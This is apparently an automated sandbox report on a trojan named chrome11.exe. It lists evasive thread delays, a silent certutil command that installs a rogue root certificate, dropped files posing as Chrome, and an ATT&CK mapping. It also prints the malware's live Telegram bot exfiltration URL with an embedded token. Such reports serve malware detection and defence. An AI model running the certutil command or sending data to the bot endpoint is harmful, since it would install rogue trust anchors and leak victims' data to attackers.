Source: C:\Users\user\Desktop\chrome11.exeMemory allocated: 1D248820000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeWindow / User API: threadDelayed 4770Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeWindow / User API: threadDelayed 1665Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7752Thread sleep count: 4770 > 30Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7752Thread sleep count: 1665 > 30Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -99887s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -99766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -99641s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -99531s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -99415s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -99297s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -99187s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -99078s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -98969s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -98859s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -98750s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -98641s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -98531s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -98422s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -98313s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -98188s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -98063s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -97953s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -97844s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -97719s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -97608s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -97485s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728Thread sleep time: -97360s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7972Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7668Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 99887Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 99766Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 99641Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 99531Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 99415Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 99297Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 99187Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 99078Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 98969Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 98859Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 98750Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 98641Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 98531Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 98422Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 98313Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 98188Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 98063Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 97953Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 97844Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 97719Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 97608Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 97485Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 97360Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: chrome11.exe, 00000000.00000002.1479408674.000001D24905D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\chrome11.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeProcess created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp"Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exeQueries volume information: C:\Users\user\Desktop\chrome11.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\chrome11.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
DLL Side-Loading
11
Process Injection
3
Masquerading
OS Credential Dumping1
Query Registry
1
Taint Shared Content
1
Archive Collected Data
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory21
Security Software Discovery
Remote Desktop Protocol2
Browser Session Hijacking
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
Virtualization/Sandbox Evasion
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS131
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Install Root Certificate
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync12
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
chrome11.exe32%ReversingLabsWin64.Trojan.Ursu
SourceDetectionScannerLabelLink
C:\Program Files\Google\Chrome\Application\chrome.exe32%ReversingLabsWin64.Trojan.Ursu
C:\Program Files\Google\Chrome\Application\original.exe (copy)32%ReversingLabsWin64.Trojan.Ursu
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
api.telegram.org
149.154.167.220
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessagefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://html4/loose.dtdchrome11.exe, chrome.exe.0.drfalse
        high
        https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/chrome11.exe, 00000000.00000002.1477410588.000001D230837000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://api.telegram.orgchrome11.exe, 00000000.00000002.1477410588.000001D2308BF000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://api.telegram.org/botchrome11.exe, chrome.exe.0.drfalse
              high
              http://.csschrome11.exe, chrome.exe.0.drfalse
                high
                http://api.telegram.orgchrome11.exe, 00000000.00000002.1477410588.000001D2308E3000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namechrome11.exe, 00000000.00000002.1477410588.000001D2308BF000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://.jpgchrome11.exe, chrome.exe.0.drfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      149.154.167.220
                      api.telegram.orgUnited Kingdom
                      62041TELEGRAMRUfalse
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1577377
                      Start date and time:2024-12-18 12:45:39 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 3s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:chrome11.exe
                      Detection:MAL
                      Classification:mal84.spre.bank.troj.adwa.evad.winEXE@4/14@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 67%
                      • Number of executed functions: 65
                      • Number of non-executed functions: 7
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 20.109.210.53
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: chrome11.exe
                      TimeTypeDescription
                      06:46:36API Interceptor24x Sleep call for process: chrome11.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      149.154.167.220urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                        urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                          RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            FileScanner.exeGet hashmaliciousUnknownBrowse
                              PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                stealer.jarGet hashmaliciousCan StealerBrowse
                                  stealer.jarGet hashmaliciousCan StealerBrowse
                                    zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                      zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                        ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          api.telegram.orgrandom.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                          • 149.154.167.220
                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                          • 149.154.167.220
                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                          • 149.154.167.220
                                          RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          FileScanner.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          stealer.jarGet hashmaliciousCan StealerBrowse
                                          • 149.154.167.220
                                          stealer.jarGet hashmaliciousCan StealerBrowse
                                          • 149.154.167.220
                                          zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                          • 149.154.167.220
                                          zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                          • 149.154.167.220
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TELEGRAMRUnoll.exeGet hashmaliciousStealc, VidarBrowse
                                          • 149.154.167.99
                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                          • 149.154.167.220
                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                          • 149.154.167.220
                                          RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          FileScanner.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          stealer.jarGet hashmaliciousCan StealerBrowse
                                          • 149.154.167.220
                                          stealer.jarGet hashmaliciousCan StealerBrowse
                                          • 149.154.167.220
                                          zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                          • 149.154.167.220
                                          zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                          • 149.154.167.220
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eLu4421.exeGet hashmaliciousStealeriumBrowse
                                          • 149.154.167.220
                                          Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                          • 149.154.167.220
                                          http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          Memo - Impairment Test 2023 MEX010B (5).jsGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 149.154.167.220
                                          PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 149.154.167.220
                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                          • 149.154.167.220
                                          RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                          • 149.154.167.220
                                          sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                          • 149.154.167.220
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Program Files\Google\Chrome\Application\original.exe (copy)fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                            C:\Program Files\Google\Chrome\Application\chrome.exefWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):4767744
                                              Entropy (8bit):5.902097026291253
                                              Encrypted:false
                                              SSDEEP:98304:DSPVtfXC+vyr+LzwQqnySs6llVYOTGFl5hShc8Q6AAqe6oahURFPvl5JTBEKY6aI:DSLXC+DOTGF/hSx/087
                                              MD5:5B39766F490F17925DEFAEE5DE2F9861
                                              SHA1:9C89F2951C255117EB3EEBCD61DBECF019A4C186
                                              SHA-256:DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
                                              SHA-512:D216FA45C98E423F15C2B52F980FC1C439D365B9799E5063E6B09837B419D197BA68D52EA7FACF469EAE38E531F17BD19EAF25D170465DC41217CA6AB9EB30BF
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 32%
                                              Joe Sandbox View:
                                              • Filename: fWAr4zGUkY.exe, Detection: malicious, Browse
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg..........".......G...........G.. ....@...... ........................I.......I...`.................................................8.G.T.....H.......................H.......G...............................................G.............. ..H............text.....G.. ....G................. ..`.rsrc.........H.......G.............@..@.reloc........H.......H.............@..BH.........-.`.......!...d.,.t9............................................(....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....8.....*......0...........~....o.....8.....*......0...........~....o.....8.....*......0...........~....o.....8.....*......0...........~....o.....8.....*......0..B........~.....(......9!...r...p.....(....o....s.............~.....8.....*.......0...........~.....8.....*......".......*...Vs....(....t.........*....(....*.0..
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):4767744
                                              Entropy (8bit):5.902097026291253
                                              Encrypted:false
                                              SSDEEP:98304:DSPVtfXC+vyr+LzwQqnySs6llVYOTGFl5hShc8Q6AAqe6oahURFPvl5JTBEKY6aI:DSLXC+DOTGF/hSx/087
                                              MD5:5B39766F490F17925DEFAEE5DE2F9861
                                              SHA1:9C89F2951C255117EB3EEBCD61DBECF019A4C186
                                              SHA-256:DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
                                              SHA-512:D216FA45C98E423F15C2B52F980FC1C439D365B9799E5063E6B09837B419D197BA68D52EA7FACF469EAE38E531F17BD19EAF25D170465DC41217CA6AB9EB30BF
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 32%
                                              Joe Sandbox View:
                                              • Filename: fWAr4zGUkY.exe, Detection: malicious, Browse
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg..........".......G...........G.. ....@...... ........................I.......I...`.................................................8.G.T.....H.......................H.......G...............................................G.............. ..H............text.....G.. ....G................. ..`.rsrc.........H.......G.............@..@.reloc........H.......H.............@..BH.........-.`.......!...d.,.t9............................................(....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....8.....*......0...........~....o.....8.....*......0...........~....o.....8.....*......0...........~....o.....8.....*......0...........~....o.....8.....*......0..B........~.....(......9!...r...p.....(....o....s.............~.....8.....*.......0...........~.....8.....*......".......*...Vs....(....t.........*....(....*.0..
                                              Process:C:\Windows\System32\certutil.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2285
                                              Entropy (8bit):7.623211339953047
                                              Encrypted:false
                                              SSDEEP:48:HetxCErYqQXUo0spKAd4V1Ht7qRT3OfWgJrM9uo99zS:HYxCvX4V1HNqRT+Pr4u
                                              MD5:1A9B8CED3F7E1013C46E8671920B6E5E
                                              SHA1:E8B100DCCEEAB3C00D17A041366196228CC3016E
                                              SHA-256:90E44AE75622F268DDD9E5C2BD48B6B5554EE322AEE6B2FD42A825A230F82100
                                              SHA-512:9BDFEF127C0F505BBC28AD348B4FC0843F0C22119AEFC5EFE3370A81DA6C414DFBD640080658A1C0B93830E317F89C732B0D40415E53BA56F23EB18E9FD3104D
                                              Malicious:false
                                              Preview:........I...............P...............Titanium Root Certificate Authority-1f839c74-64c2-4b71-8bfa-f392f9ebc026.....................RSA1.................amW...p":.@..&'.....4...d..L!.&&..|f.......v^.....aD.F\.3......E}.7.4...`...i(S.....<a..Q..Rt28..o...!.S|..;.r8.q.......t....}.).$..kH.........FU..V.;..".))o..^CuOA.[....F.?&..F...,v...X.4.1.([2....R.%..#.....9.K..\.s...=1.HcL...p....1/p..k.......................z..O......Z..r...D.>(..y......,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....{...".....u.'I.!^T.C..y.4enB..l............ .....u]..Y...5..lWt.j@.+..z.0...y.P.......{..R}.e!..U.....p.X..C&<...3...,...$..iI....^...O.....490["..o.Yu.._.:.&M.:$.....e+.f.wx0X...}.9y..u..f..ui?F.Dh`i...<5..+&...[....j..J..9..N...p.#R...'...s...]Jv.q<#.6.!J.n..W.....v...HJ&..5.o.6X9.x.M..Z.3_...._vO%.g..\"j....T.%. ..0l$.'.:.......B.`-...c.N..b:.*.....y....f.E..j..I.o...XY....*2E.(.......9..i.=..B.a..d$.:.U..g.Mw.G1.f(..V.'..H.G{>(b.T........T..N.cfp.
                                              Process:C:\Windows\System32\certutil.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2251
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:0158FE9CEAD91D1B027B795984737614
                                              SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                              SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                              SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):2034
                                              Entropy (8bit):5.382609664334896
                                              Encrypted:false
                                              SSDEEP:48:MxHKQrHNpOYHKGSI6o6+vxp3/elFHptHTHhAHKKkxHB1qHGIs0HKD:iqYtpOYqGSI6o9Zp/elFJtzHeqKkxhw6
                                              MD5:2BE09B8559C289356470B28D09A3A86D
                                              SHA1:7CB90D943BD4C993204AB6548039F0F48E82D263
                                              SHA-256:6899F7B36D91DD203BC84978E434AFDA3B560AB59662BED11BDB0480D6179517
                                              SHA-512:311E100C3DE17B1DC60FC933E95A28B196BB291FB5C516C5B250E12FAC673DBF34A2AB8A2CD8278AE6B0B25799A94612F0E556AE4C7EE5DDD406CE56A2523869
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.303
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2631
                                              Entropy (8bit):7.841145153995131
                                              Encrypted:false
                                              SSDEEP:48:LiEUWlXUIWr9ZdiYpA1bd0nqTn3nlf6pPsdkrdFD:L9xXUh9DPA1bdE8d6UkZ
                                              MD5:DBB05A66426586C397035EBCE4FDFB8A
                                              SHA1:ABA63C97F879C7E319BC53DAE7A9714986EC35B2
                                              SHA-256:3AE2483C0531414BFEB1EC07D00B7CB1E6885D8ABD498FFBFA541ABB137149A5
                                              SHA-512:6FBF442332EA5B7389160E7E00E11D684BA2708F81C9BBE3865C6319215C6CDB0A323370832A54F65E7C0378DCF2D8C0E106D753935C827DF97194D779786766
                                              Malicious:false
                                              Preview:0....0...*.H........$.....0.0...*.H........$.....0...0.....*.H............0...0(..*.H.......0....X....^.../p....W.........{"6.C.+&.O}p.6/...|.h..6@..0...3.bGu...8.K./...`../G.c=.K.?!.W5.......4.0n._m.W&S..@....._..|/.P1[..b.....W.....5Wn.J....u.K..$.'N..b!.*2[[...#.4..i....J.B.zh.[......K....B!...".ZN..9.b9...u2.........d(.:...&m].a.{...M....9.Aq......'.].;. ..*.....?..........n\....r.8.$..8s3.D..$..Z.$..d...).....(=...A....3..<Oth.U..3.2......h\...p........6...^j..W..9..Q....w.a.O*.y........W|G...}.I......x...uPz.=)..J{/..\..2..3.`.....{>..YLa..f..#..Q...~..q.Ge..+. ..\.b.......p.ao...+XK`.0 a<,.*.*#....$.Z.U./i..i..r.P....y$a..C.r...s...d.<gg..t..G.j...s......^xz... |...P;'........"g..s.....m......Cb..$..Jw....}..(....f..X'............S..:.Q..(.8h..X.s....eg".....A.M...r..A.....q.G9.....Y..i.L.......r"...j...4...........N....S...Mp...wz...3...#]y./....5..6...F...R.\..J.U[=.)L.O?.t!.mKH..[.B0.!..z ....P.&... .=`..).b..U...k./T.?o..[`.@..q..{.
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2631
                                              Entropy (8bit):7.841145153995131
                                              Encrypted:false
                                              SSDEEP:48:LiEUWlXUIWr9ZdiYpA1bd0nqTn3nlf6pPsdkrdFD:L9xXUh9DPA1bdE8d6UkZ
                                              MD5:DBB05A66426586C397035EBCE4FDFB8A
                                              SHA1:ABA63C97F879C7E319BC53DAE7A9714986EC35B2
                                              SHA-256:3AE2483C0531414BFEB1EC07D00B7CB1E6885D8ABD498FFBFA541ABB137149A5
                                              SHA-512:6FBF442332EA5B7389160E7E00E11D684BA2708F81C9BBE3865C6319215C6CDB0A323370832A54F65E7C0378DCF2D8C0E106D753935C827DF97194D779786766
                                              Malicious:false
